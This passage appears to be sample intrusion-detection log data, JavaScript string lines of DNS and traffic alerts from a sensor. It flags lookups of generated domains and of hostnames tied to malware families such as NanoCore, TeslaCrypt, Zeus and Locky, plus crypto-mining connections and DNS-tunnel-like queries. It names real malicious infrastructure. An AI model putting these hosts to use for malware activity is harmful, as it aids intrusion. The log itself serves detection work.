    '"2021-01-11 00:47:34.011507" r2d2 8.8.8.8 53 2.200.109.50 61009 UDP DNS (hggfsplmmg).info "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:47:34.011509" r2d2 8.8.8.8 53 2.200.109.50 61009 UDP DNS (hggfsplmmg).info "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:47:34.012156" r2d2 10.1.20.50 53 10.2.120.16 1696 UDP DNS (hggfsplmmg).info "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:47:37.216754" r2d2 2.200.110.232 65081 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:47:37.226212" r2d2 2.200.107.146 1030 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:47:37.260375" r2d2 2.200.110.233 63706 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:47:41.262861" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (qiyawdlponi).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:41.262860" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (qiyawdlponi).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:41.262863" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (qiyawdlponi).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:41.263237" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS (cydifzjxwc).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:41.263624" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (mymzfbrgzmq).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:41.263612" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (mymzfbrgzmq).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:41.263618" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (mymzfbrgzmq).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:41.264188" r2d2 2.200.109.50 60829 8.8.8.8 53 UDP DNS (cydifzjxwc).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:41.263868" r2d2 2.200.109.50 62265 8.8.8.8 53 UDP DNS (qiyawdlponi).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:41.263746" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS (yszoonvasi).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:41.264658" r2d2 2.200.109.50 61770 8.8.8.8 53 UDP DNS (mymzfbrgzmq).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:41.283191" r2d2 8.8.8.8 53 2.200.109.50 62265 UDP DNS (qiyawdlponi).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:41.283184" r2d2 8.8.8.8 53 2.200.109.50 62265 UDP DNS (qiyawdlponi).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:41.439168" r2d2 8.8.8.8 53 2.200.109.50 60829 UDP DNS (cydifzjxwc).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:41.439562" r2d2 10.1.20.50 53 10.2.120.16 1693 UDP DNS (cydifzjxwc).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:41.508125" r2d2 2.200.97.1 59172 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:47:48.565374" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS (zncvp).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:48.565386" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS (zncvp).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:48.565385" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS (zncvp).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:48.588195" r2d2 8.8.8.8 53 2.200.109.50 60528 UDP DNS (zncvp).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:48.588483" r2d2 10.1.20.50 53 10.2.120.16 1693 UDP DNS (jlqcqzwfgl).info "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:47:48.588193" r2d2 8.8.8.8 53 2.200.109.50 60528 UDP DNS (zncvp).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:48.587887" r2d2 8.8.8.8 53 2.200.109.50 60671 UDP DNS (jlqcqzwfgl).info "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:47:48.588182" r2d2 8.8.8.8 53 2.200.109.50 60528 UDP DNS (zncvp).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:56.251390" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (rguhtvx).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:56.252886" r2d2 2.200.109.50 62063 8.8.8.8 53 UDP DNS (nxijoowwkn).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:56.251381" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (rguhtvx).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:56.251392" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (rguhtvx).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:56.251447" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS (nxijoowwkn).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:56.252778" r2d2 2.200.109.50 60489 8.8.8.8 53 UDP DNS (rguhtvx).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:56.370432" r2d2 8.8.8.8 53 2.200.109.50 60489 UDP DNS (rguhtvx).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:59.610837" r2d2 2.200.110.232 49372 2.200.107.168 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 00:47:59.611216" r2d2 2.200.110.232 64430 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:47:59.617300" r2d2 2.200.107.146 21150 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:48:03.526115" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS (niobwg).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:03.526122" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (ptjezjhba).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:03.526111" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS (niobwg).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:03.526117" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS (niobwg).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:03.526124" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (ptjezjhba).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:03.526118" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (ptjezjhba).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:03.526755" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS (tsfpe).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:03.526398" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS (kjiewm).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:03.527138" r2d2 2.200.109.50 61398 8.8.8.8 53 UDP DNS (ptjezjhba).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:03.527136" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS (eabyvmer).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:03.527569" r2d2 2.200.109.50 61481 8.8.8.8 53 UDP DNS (kjiewm).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:03.528175" r2d2 2.200.109.50 61047 8.8.8.8 53 UDP DNS (eabyvmer).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:03.546211" r2d2 8.8.8.8 53 2.200.109.50 62603 UDP DNS (lwqqdrnozrw).info "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:48:03.547038" r2d2 10.1.20.50 53 10.2.120.16 1696 UDP DNS (lwqqdrnozrw).info "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:48:03.546196" r2d2 8.8.8.8 53 2.200.109.50 62603 UDP DNS (lwqqdrnozrw).info "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:48:03.546218" r2d2 8.8.8.8 53 2.200.109.50 62603 UDP DNS (lwqqdrnozrw).info "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:48:03.645673" r2d2 8.8.8.8 53 2.200.109.50 61481 UDP DNS (kjiewm).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:03.645682" r2d2 8.8.8.8 53 2.200.109.50 61481 UDP DNS (kjiewm).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:03.646362" r2d2 10.1.20.50 53 10.2.120.16 1693 UDP DNS (kjiewm).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:03.712439" r2d2 8.8.8.8 53 2.200.109.50 61047 UDP DNS (eabyvmer).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:03.712441" r2d2 8.8.8.8 53 2.200.109.50 61047 UDP DNS (eabyvmer).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:03.732086" r2d2 8.8.8.8 53 2.200.109.50 62364 UDP DNS (niobwg).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:03.732101" r2d2 8.8.8.8 53 2.200.109.50 62364 UDP DNS (niobwg).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:03.732072" r2d2 8.8.8.8 53 2.200.109.50 62364 UDP DNS (niobwg).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:10.805455" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS (oqxhkp).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:10.806141" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (dsxkb).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:10.806156" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (dsxkb).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:10.806022" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS (jojof).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:10.806165" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (dsxkb).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:10.806236" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS (ucqgytkie).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:10.829133" r2d2 8.8.8.8 53 2.200.109.50 60723 UDP DNS (oqxhkp).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:10.828162" r2d2 8.8.8.8 53 2.200.109.50 62330 UDP DNS (fpmdlmwkkj).info "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:48:10.829121" r2d2 8.8.8.8 53 2.200.109.50 60723 UDP DNS (oqxhkp).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:10.829130" r2d2 8.8.8.8 53 2.200.109.50 60723 UDP DNS (oqxhkp).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:10.829247" r2d2 10.1.20.50 53 10.2.120.16 1690 UDP DNS (fpmdlmwkkj).info "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:48:10.918368" r2d2 8.8.8.8 53 2.200.109.50 60647 UDP DNS (jojof).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:10.919111" r2d2 8.8.8.8 53 2.200.109.50 60141 UDP DNS (dsxkb).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:10.918384" r2d2 8.8.8.8 53 2.200.109.50 60647 UDP DNS (jojof).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:10.918381" r2d2 8.8.8.8 53 2.200.109.50 60647 UDP DNS (jojof).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:10.918973" r2d2 8.8.8.8 53 2.200.109.50 60141 UDP DNS (dsxkb).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:10.919123" r2d2 8.8.8.8 53 2.200.109.50 60141 UDP DNS (dsxkb).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:17.045563" r2d2 10.3.160.42 14677 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:48:17.141158" r2d2 10.3.160.42 14677 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:48:17.242091" r2d2 10.3.160.42 14677 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:48:17.443354" r2d2 10.3.160.42 14677 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:48:17.742336" r2d2 10.3.160.42 14677 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:48:18.140776" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS (zqtzsszurp).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:18.142872" r2d2 10.3.160.42 14677 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:48:25.471076" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS (dghsvpy).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:25.471207" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (fnobvhidxg).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:25.471214" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (fnobvhidxg).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:25.471735" r2d2 2.200.109.50 61179 8.8.8.8 53 UDP DNS (dghsvpy).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:25.471933" r2d2 2.200.109.50 61202 8.8.8.8 53 UDP DNS (fnobvhidxg).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:48:25.490939" r2d2 8.8.8.8 53 2.200.109.50 61202 UDP DNS (fnobvhidxg).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:25.490842" r2d2 8.8.8.8 53 2.200.109.50 61179 UDP DNS (dghsvpy).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:25.490851" r2d2 8.8.8.8 53 2.200.109.50 61179 UDP DNS (dghsvpy).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:25.490942" r2d2 8.8.8.8 53 2.200.109.50 61202 UDP DNS (fnobvhidxg).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:48:25.493431" r2d2 8.8.8.8 53 2.200.109.50 61220 UDP DNS (wrgqdxlaltc).biz "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:48:25.494203" r2d2 10.1.20.50 53 10.2.120.16 1690 UDP DNS (wrgqdxlaltc).biz "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:48:25.498948" r2d2 8.8.8.8 53 2.200.109.50 62343 UDP DNS (cxdzxthzfy).net "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:48:25.499581" r2d2 10.1.20.50 53 10.2.120.16 1693 UDP DNS (cxdzxthzfy).net "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:48:25.498955" r2d2 8.8.8.8 53 2.200.109.50 62343 UDP DNS (cxdzxthzfy).net "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:48:25.498957" r2d2 8.8.8.8 53 2.200.109.50 62343 UDP DNS (cxdzxthzfy).net "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:48:43.400830" r2d2 2.200.110.232 49481 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:48:47.268067" r2d2 2.200.110.233 65340 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:49:02.122800" r2d2 178.17.174.14 52532 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/5.0 \\(Windows NT 6.1; WOW64; Trident/7.0; NP08; FunWebProducts; MAAU; NP08; rv:11.0\\) like Gecko)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:49:12.354438" r2d2 178.17.174.14 53076 2.200.109.24 80 TCP UA "Solar (Mozilla/5.0 \\(Windows NT 6.1; WOW64; Trident/7.0; BOIE9;ENGB; Solaris 9; rv:11.0\\) like Gecko)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:49:43.381368" r2d2 2.200.110.232 49292 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:49:43.386652" r2d2 2.200.107.146 18717 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:49:43.392297" r2d2 2.200.110.232 63668 2.200.107.168 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:49:43.396544" r2d2 2.200.107.146 41656 212.18.248.42 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:49:48.325647" r2d2 10.44.70.211 51379 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;bfaceb91-6871-400d-88d4-0eda679b36a6;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:49:56.692594" r2d2 2.200.110.232 65311 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:49:56.693955" r2d2 2.200.107.146 63865 52.57.28.60 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:49:56.716627" r2d2 2.200.110.233 65025 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:49:57.281186" r2d2 2.200.110.232 64824 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:49:57.320734" r2d2 2.200.110.233 64329 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:49:59.624153" r2d2 2.200.110.232 65527 2.200.107.168 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 00:49:59.626757" r2d2 2.200.107.146 54218 192.12.94.30 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 00:50:15.937866" r2d2 178.17.174.14 57550 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; BTRS106332; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 2.0.50727\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:50:17.231407" r2d2 10.3.160.42 14678 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:50:17.331174" r2d2 10.3.160.42 14678 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:50:17.430757" r2d2 10.3.160.42 14678 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:50:17.634194" r2d2 10.3.160.42 14678 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:50:17.931787" r2d2 10.3.160.42 14678 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:50:18.830656" r2d2 10.3.160.42 14678 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:50:58.821968" r2d2 10.43.192.103 55571 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:50:59.607787" r2d2 2.200.110.232 64304 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:50:59.625872" r2d2 2.200.110.232 64836 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:50:59.627624" r2d2 2.200.110.232 64008 2.200.107.168 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:50:59.633871" r2d2 2.200.107.146 29705 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:51:04.302016" r2d2 173.194.170.98 57671 2.200.104.43 53 UDP DNS (d7a5ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:04.334297" r2d2 173.194.169.1 60075 2.200.104.43 53 UDP DNS (d7a5ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:04.334311" r2d2 173.194.169.1 60075 2.200.104.43 53 UDP DNS (d7a5ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:05.271319" r2d2 172.217.40.3 59509 2.200.104.43 53 UDP DNS (135dff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:05.271329" r2d2 172.217.40.3 59509 2.200.104.43 53 UDP DNS (135dff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:05.303508" r2d2 172.217.41.2 58387 2.200.104.43 53 UDP DNS (135dff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:06.295297" r2d2 172.217.40.70 39333 2.200.104.43 53 UDP DNS (a26bff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:06.295286" r2d2 172.217.40.70 39333 2.200.104.43 53 UDP DNS (a26bff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:07.325043" r2d2 2.200.110.233 63404 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:51:08.318427" r2d2 173.194.169.106 60943 2.200.104.43 53 UDP DNS (c623ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:09.359265" r2d2 173.194.170.97 56285 2.200.104.43 53 UDP DNS (5004ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:09.392422" r2d2 172.217.40.5 38431 2.200.104.43 53 UDP DNS (5004ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:10.384586" r2d2 173.194.169.6 62463 2.200.104.43 53 UDP DNS (9332ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:10.384575" r2d2 173.194.169.6 62463 2.200.104.43 53 UDP DNS (9332ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:10.416283" r2d2 173.194.170.73 55074 2.200.104.43 53 UDP DNS (9332ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:10.894406" r2d2 10.43.192.103 55573 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:51:11.417701" r2d2 173.194.170.7 63467 2.200.104.43 53 UDP DNS (973eff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:11.417703" r2d2 173.194.170.7 63467 2.200.104.43 53 UDP DNS (973eff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:11.449645" r2d2 173.194.170.106 64807 2.200.104.43 53 UDP DNS (973eff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:13.444821" r2d2 172.217.40.11 64262 2.200.104.43 53 UDP DNS (e877ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:13.473555" r2d2 173.194.169.5 64860 2.200.104.43 53 UDP DNS (e877ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:13.473548" r2d2 173.194.169.5 64860 2.200.104.43 53 UDP DNS (e877ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:15.461921" r2d2 172.217.40.72 50628 2.200.104.43 53 UDP DNS (2b68ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:15.461928" r2d2 172.217.40.72 50628 2.200.104.43 53 UDP DNS (2b68ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:16.605188" r2d2 2.200.110.233 65079 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:51:16.805182" r2d2 2.200.110.233 64467 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 00:51:16.889114" r2d2 2.200.107.146 42117 97.74.105.26 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:51:16.887656" r2d2 2.200.110.233 64943 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:51:16.931993" r2d2 10.43.192.103 55574 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:51:17.552758" r2d2 172.217.41.1 47535 2.200.104.43 53 UDP DNS (cb28ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:17.552747" r2d2 172.217.41.1 47535 2.200.104.43 53 UDP DNS (cb28ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:17.581230" r2d2 173.194.169.105 42847 2.200.104.43 53 UDP DNS (cb28ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:18.569917" r2d2 173.194.170.72 56425 2.200.104.43 53 UDP DNS (33d9ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:18.569926" r2d2 173.194.170.72 56425 2.200.104.43 53 UDP DNS (33d9ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:19.597966" r2d2 173.194.169.109 41833 2.200.104.43 53 UDP DNS (1557ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:19.597908" r2d2 173.194.169.109 41833 2.200.104.43 53 UDP DNS (1557ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:51:20.639548" r2d2 172.217.41.7 63580 2.200.104.43 53 UDP DNS (4d38ff3bb776736d6c686a69656c7964747875696200).redacted.com "long domain (suspicious)" (heuristic)\n' +
